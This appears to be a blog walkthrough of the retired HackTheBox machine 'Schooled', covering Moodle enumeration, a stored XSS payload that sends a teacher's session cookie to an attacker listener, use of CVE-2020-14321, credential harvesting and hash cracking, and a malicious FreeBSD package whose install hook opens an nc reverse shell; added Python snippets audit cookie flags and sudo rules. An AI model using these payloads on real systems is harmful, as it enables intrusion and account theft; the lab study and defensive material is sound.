Hackthebox - Schooled

Summary

Schooled, a FreeBSD machine on Hackthebox created by user TheCyberGeek, was a medium difficulty machine. The initial foothold was a Cross-Site Scripting (XSS) attack to steal a teacher's cookie. With the teacher account it was about using CVE-2020-14321 to get RCE and a shell. After getting a shell on the box it is about finding a hash, cracking it and using that password to get user on the box. Privilege escalation on the box was about creating a malicious package and installing it, which gets us root.

Initial Enumeration

nmap

$ nmap -sC -sV -oN nmap/schooled 10.10.10.234
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-04 12:27 IST
Nmap scan report for 10.10.10.234
Host is up (0.083s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9 (FreeBSD 20200214; protocol 2.0)
| ssh-hostkey:
| 2048 1d:69:83:78:fc:91:f8:19:c8:75:a7:1e:76:45:05:dc (RSA)
| 256 e9:b2:d2:23:9d:cf:0e:63:e0:6d:b9:b1:a6:86:93:38 (ECDSA)
|_ 256 7f:51:88:f7:3c:dd:77:5e:ba:25:4d:4c:09:25:ea:1f (ED25519)
80/tcp open http Apache httpd 2.4.46 ((FreeBSD) PHP/7.4.15)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.46 (FreeBSD) PHP/7.4.15
|_http-title: Schooled - A new kind of educational institute
Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.44 seconds

We see two ports open, 22 and 80. From the SSH banner we know the box is FreeBSD (FreeBSD 20200214; protocol 2.0).

Let's enumerate more on 80.

Web (80)

From the page we find an email address, admissions@schooled.htb, so I kept that in my notes.

I also added schooled.htb to my hosts file to see if we get something else.

From teachers.html I created a list of names to use as potential usernames:
curl -s http://schooled.htb/teachers.html | grep '<h3 class="title">' | cut -d'>' -f2 | cut -d'<' -f1 > names.txt

While doing this manual enumeration I was also running gobuster for directory and vhost enumeration, and in vhost enumeration I found a subdomain:

moodle.schooled.htb

$ gobuster vhost -w "/opt/tools/SecLists/Discovery/DNS/subdomains-top1million-5000.txt" -u "http://schooled.htb"
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://schooled.htb
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/tools/SecLists/Discovery/DNS/subdomains-top1million-5000.txt
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/04/04 12:42:56 Starting gobuster in VHOST enumeration mode
===============================================================
Found: moodle.schooled.htb (Status: 200) [Size: 84]

===============================================================
2021/04/04 12:43:47 Finished
===============================================================

So I added moodle.schooled.htb to my hosts file:

$ echo '10.10.10.234 moodle.schooled.htb' >> /etc/hosts

moodle.schooled.htb

From upgrade.txt (http://moodle.schooled.htb/moodle/lib/upgrade.txt) we find the Moodle version to be 3.9.

Seeing a register page, I tried to register myself.

We get an error saying only student.schooled.htb email addresses can register, so I added that domain to my hosts file to check later

and registered an account with that email domain.

After that I started playing with the application, enrolled myself in the Mathematics course and tried sending an XSS payload to the teacher.


XSS Confirmation

Payload:

<image src=1 href=1 onerror="javascript:alert(1)"></image>

Now that we know we have XSS, let's try to steal the cookie from the teacher:

<img src=x onerror="this.src='http://10.10.14.X:8000/?'+document.cookie; this.removeAttribute('onerror');">

Trying to message the teacher didn't get me anything.

Checking the course announcement I saw

So I went to my profile, added the XSS payload in my MoodleNet Profile field, and after waiting a few seconds I got the cookie:

$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.14.23 - - [04/Apr/2021 13:08:07] "GET /?MoodleSession=cjdpon0sak8e9kdbhauombsi0r HTTP/1.1" 200 -
10.10.14.23 - - [04/Apr/2021 13:09:06] "GET /?MoodleSession=cjdpon0sak8e9kdbhauombsi0r HTTP/1.1" 200 -
10.10.14.23 - - [04/Apr/2021 13:15:40] "GET /?MoodleSession=cjdpon0sak8e9kdbhauombsi0r HTTP/1.1" 200 -
10.10.10.234 - - [04/Apr/2021 13:16:21] "GET /?MoodleSession=j41ehgdm2admi1puitrleplieu HTTP/1.1" 200 -
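The theft above works for two separate reasons: the profile field is rendered into the page without HTML escaping, and the MoodleSession cookie is readable from document.cookie, which means it was set without HttpOnly. The following Python is an added example and not part of the original write-up: it checks a Set-Cookie header for the attributes that would have blunted the theft, flags event-handler markup in a free-text field with a rough heuristic, and shows the raw versus escaped rendering of the write-up's own alert probe. The attribute policy, the regexes and the two cookie header strings are constructed for the example.

```python
import html
import re

# Attributes a session cookie should carry: HttpOnly keeps it out of
# document.cookie, Secure keeps it off plaintext HTTP, SameSite limits
# cross-site sending. (Constructed policy list for this example.)
REQUIRED_COOKIE_ATTRS = ("HttpOnly", "Secure", "SameSite")


def parse_set_cookie(header):
    """Split a Set-Cookie header value into (name, value, {attr_lower: value|True})."""
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        if not part:
            continue
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip() or True
    return name.strip(), value.strip(), attrs


def cookie_weaknesses(header):
    """Return the hardening attributes missing from a Set-Cookie header."""
    _, _, attrs = parse_set_cookie(header)
    missing = [a for a in REQUIRED_COOKIE_ATTRS if a.lower() not in attrs]
    samesite = attrs.get("samesite")
    if isinstance(samesite, str) and samesite.lower() == "none":
        missing.append("SameSite=None gives no cross-site protection")
    return missing


# Rough heuristic for probes in free-text profile fields: a tag carrying an
# on* event handler, or an explicit <script> tag. A detection aid only; it is
# not a substitute for output encoding.
_EVENT_HANDLER = re.compile(r"<[^>]*\son\w+\s*=", re.IGNORECASE)
_SCRIPT_TAG = re.compile(r"<\s*script\b", re.IGNORECASE)


def looks_like_html_injection(value):
    return bool(_EVENT_HANDLER.search(value) or _SCRIPT_TAG.search(value))


def render_profile_field(value, escape=True):
    """Render a user-supplied field inside a <p>. escape=False is the bug that
    turns a stored profile field into stored XSS."""
    body = html.escape(value, quote=True) if escape else value
    return f'<p class="profile-field">{body}</p>'


# Constructed samples: the alert probe from the write-up and two cookie headers.
PROBE = '<image src=1 href=1 onerror="javascript:alert(1)"></image>'
WEAK_COOKIE = "MoodleSession=example-session-id; path=/moodle"
HARDENED_COOKIE = "MoodleSession=example-session-id; Path=/moodle; HttpOnly; Secure; SameSite=Lax"

if __name__ == "__main__":
    print("weak cookie missing:    ", cookie_weaknesses(WEAK_COOKIE))
    print("hardened cookie missing:", cookie_weaknesses(HARDENED_COOKIE))
    print("probe flagged:          ", looks_like_html_injection(PROBE))
    print("raw render:    ", render_profile_field(PROBE, escape=False))
    print("escaped render:", render_profile_field(PROBE))
```

With HttpOnly set, document.cookie returns nothing for the session cookie, so the onerror payload has nothing to send; in Moodle the flag is controlled by the cookiehttponly setting (and Secure by cookiesecure). Escaping on output removes the XSS entirely, so the heuristic is only useful as a log or moderation signal.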

Using that cookie I got a session as Manuel Phillips. After this I was stuck for a very long time; googling around I found CVE-2020-14321 along with a video and a GitHub page about it.

Following the steps in the video I was able to get a shell as www.

www

Enumerating the box I found the DB credentials moodle:PlaybookMaster2020 in config.php:

[www@Schooled /usr/local/www/apache24/data/moodle]$ cat config.php
<?php // Moodle configuration file

unset($CFG);
global $CFG;
$CFG = new stdClass();

$CFG->dbtype = 'mysqli';
$CFG->dblibrary = 'native';
$CFG->dbhost = 'localhost';
$CFG->dbname = 'moodle';
$CFG->dbuser = 'moodle';
$CFG->dbpass = 'PlaybookMaster2020';
$CFG->prefix = 'mdl_';
$CFG->dboptions = array (
'dbpersist' => 0,
'dbport' => 3306,
'dbsocket' => '',
'dbcollation' => 'utf8_unicode_ci',
);

$CFG->wwwroot = 'http://moodle.schooled.htb/moodle';
$CFG->dataroot = '/usr/local/www/apache24/moodledata';
$CFG->admin = 'admin';

$CFG->directorypermissions = 0777;

require_once(__DIR__ . '/lib/setup.php');

// There is no php closing tag in this file,
// it is intentional because it prevents trailing whitespace problems!

Trying

$ mysql -u moodle -D moodle

gave an error that the mysql binary was not found, but running

$ find / -name mysql 2>/dev/null

showed that mysql was present on the box in /usr/local/bin:

/usr/local/bin/mysql -u moodle -D moodle -p -e "select * from mdl_user"

Using that I connected to the database and grabbed the admin user's password hash: $2y$10$3D/gznFHdpV6PXt1cLPhX.ViTgs87DCE5KqphQhGYR5GFbcl4qTiW

Cracking the password using john:

$ john --wordlist=/usr/share/wordlist/rockyou hash
...[snip]...
!QAZ2wsx
--- [snip]...

As the email address for admin was jamie@staff.schooled.htb, I tried the same password over SSH for the jamie user, which gets us user.

User (Jamie)

1
2
3
4
5
6
7
$ sshpass -p '!QAZ2wsx' ssh jamie@10.10.10.234
...[snip]...
jamie@Schooled:~ $ whoami;hostname;date;
jamie
Schooled
Sun Apr 4 12:42:05 BST 2021
jamie@Schooled:~ $

Privilege Escalation (Jamie -> Root)

Checking sudo -l:

jamie@Schooled:~ $ sudo -l
User jamie may run the following commands on Schooled:
(ALL) NOPASSWD: /usr/sbin/pkg update
(ALL) NOPASSWD: /usr/sbin/pkg install *

We see we can install a pkg without a password,

so let's create a malicious package and try installing it.

I used the exploit from this blog post:

#!/bin/sh

STAGEDIR=/tmp/stage
rm -rf ${STAGEDIR}
mkdir -p ${STAGEDIR}

cat >> ${STAGEDIR}/+PRE_DEINSTALL <<EOF
# careful here, this may clobber your system
echo "Resetting root shell"
pw usermod -n root -s /bin/csh
EOF

cat >> ${STAGEDIR}/+POST_INSTALL <<EOF
# careful here, this may clobber your system
echo "Registering root shell"
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.X.X 4444 >/tmp/f
EOF

cat >> ${STAGEDIR}/+MANIFEST <<EOF
name: f3v3r
version: "1.0_6"
origin: sysutils/f3v3r
comment: "automates stuff"
desc: "automates tasks which can also be undone later"
maintainer: john@doe.it
www: https://doe.it
prefix: /
EOF

echo "deps: {" >> ${STAGEDIR}/+MANIFEST
pkg query " %n: { version: \"%v\", origin: %o }" portlint >> ${STAGEDIR}/+MANIFEST
pkg query " %n: { version: \"%v\", origin: %o }" poudriere >> ${STAGEDIR}/+MANIFEST
echo "}" >> ${STAGEDIR}/+MANIFEST

mkdir -p ${STAGEDIR}/usr/local/etc
echo "# hello world" > ${STAGEDIR}/usr/local/etc/my.conf
echo "/usr/local/etc/my.conf" > ${STAGEDIR}/plist

pkg create -m ${STAGEDIR}/ -r ${STAGEDIR}/ -p ${STAGEDIR}/plist -o .

and tried installing the pkg:

jamie@Schooled:/tmp/.f3v3r $ sudo pkg install  *.txz
Updating FreeBSD repository catalogue...
pkg: Repository FreeBSD has a wrong packagesite, need to re-create database

but got this error. Checking the man page of pkg-install,

we see an option --no-repo-update.

Running

$ sudo pkg install --no-repo-update  *.txz
pkg: Repository FreeBSD has a wrong packagesite, need to re-create database
..[snip]..
New packages to be INSTALLED:
f3v3r: 1.0_6

Number of packages to be installed: 1

Proceed with this action? [y/N]: y
[1/1] Installing f3v3r-1.0_6...
Extracting f3v3r-1.0_6: 100%
Registering root shell

and we get a reverse shell as root.
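The root cause of this escalation is the sudoers rule shown by sudo -l above: the trailing * in pkg install * is matched against the entire remaining argument string, so it also covers --no-repo-update and a path to a local .txz, and the package's install hooks then run as root. As an added example that is not part of the write-up, here is a small Python audit of sudo -l output that flags package-manager rules with wildcard arguments and shows which requested command lines such a rule admits. The sudo -l text is the one from the write-up; the package-manager list is constructed, and sudo_rule_allows is an fnmatch-based approximation of sudo's own matching, not sudo's code.

```python
import fnmatch
import re
import shlex

# Package managers whose install subcommand accepts a local package file.
# With a wildcard rule, that file's install hooks run with sudo's privileges.
# (Constructed list for this example.)
PACKAGE_MANAGERS = {"pkg", "apt", "apt-get", "dpkg", "yum", "dnf", "rpm", "zypper"}

# One `sudo -l` rule line: "(runas) TAG: TAG: /path/to/cmd args..."
_RULE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+?)\s*$")


def parse_sudo_l(text):
    """Parse the rule lines of `sudo -l` output; header lines are skipped."""
    rules = []
    for line in text.splitlines():
        m = _RULE.match(line)
        if not m:
            continue
        tags = [t.rstrip(":") for t in m.group("tags").split()]
        argv = shlex.split(m.group("cmd"))
        rules.append({
            "runas": m.group("runas"),
            "nopasswd": "NOPASSWD" in tags,
            "path": argv[0],
            "args": argv[1:],
        })
    return rules


def rule_findings(rule):
    """Reasons a rule is risky; an empty list means nothing flagged."""
    findings = []
    base = rule["path"].rsplit("/", 1)[-1]
    wildcard_args = [a for a in rule["args"] if any(c in a for c in "*?[")]
    if wildcard_args:
        findings.append(f"wildcard argument(s) {wildcard_args}: matches any remaining argument string")
    if base in PACKAGE_MANAGERS and wildcard_args:
        findings.append(f"{base} rule accepts arbitrary local package files, whose install hooks run as {rule['runas']}")
    if not rule["args"]:
        findings.append("no argument restriction at all")
    if rule["nopasswd"] and findings:
        findings.append("NOPASSWD: no password prompt for a caller who already has the account")
    return findings


def audit_sudo_l(text):
    """Map each rule's command line to its findings."""
    return {" ".join([r["path"], *r["args"]]): rule_findings(r) for r in parse_sudo_l(text)}


def sudo_rule_allows(rule, argv):
    """Approximation of sudoers matching: exact path, then the rule's argument
    pattern matched against the whole requested argument string, so '*' spans
    spaces. A rule with no arguments allows any arguments."""
    if argv[0] != rule["path"]:
        return False
    if not rule["args"]:
        return True
    return fnmatch.fnmatchcase(" ".join(argv[1:]), " ".join(rule["args"]))


# The sudo -l output from the write-up.
SUDO_L_OUTPUT = """\
User jamie may run the following commands on Schooled:
    (ALL) NOPASSWD: /usr/sbin/pkg update
    (ALL) NOPASSWD: /usr/sbin/pkg install *
"""

if __name__ == "__main__":
    for cmd, findings in audit_sudo_l(SUDO_L_OUTPUT).items():
        print(cmd, "->", findings or "ok")
    install_rule = parse_sudo_l(SUDO_L_OUTPUT)[1]
    print(sudo_rule_allows(install_rule, ["/usr/sbin/pkg", "install", "--no-repo-update", "/tmp/local.txz"]))
```

The pkg update rule passes because its argument list is fixed, while pkg install * is flagged. The fix is to drop the wildcard and grant only the exact command lines the user needs (for example a fixed pkg upgrade invocation), so no path to a local package file can be supplied; in real sudoers, an empty "" argument means no arguments at all, whereas a command with no arguments listed allows any.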

Author: Shubham Kumar
Link: https://f3v3r.in/htb/machines/retired/schooled/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.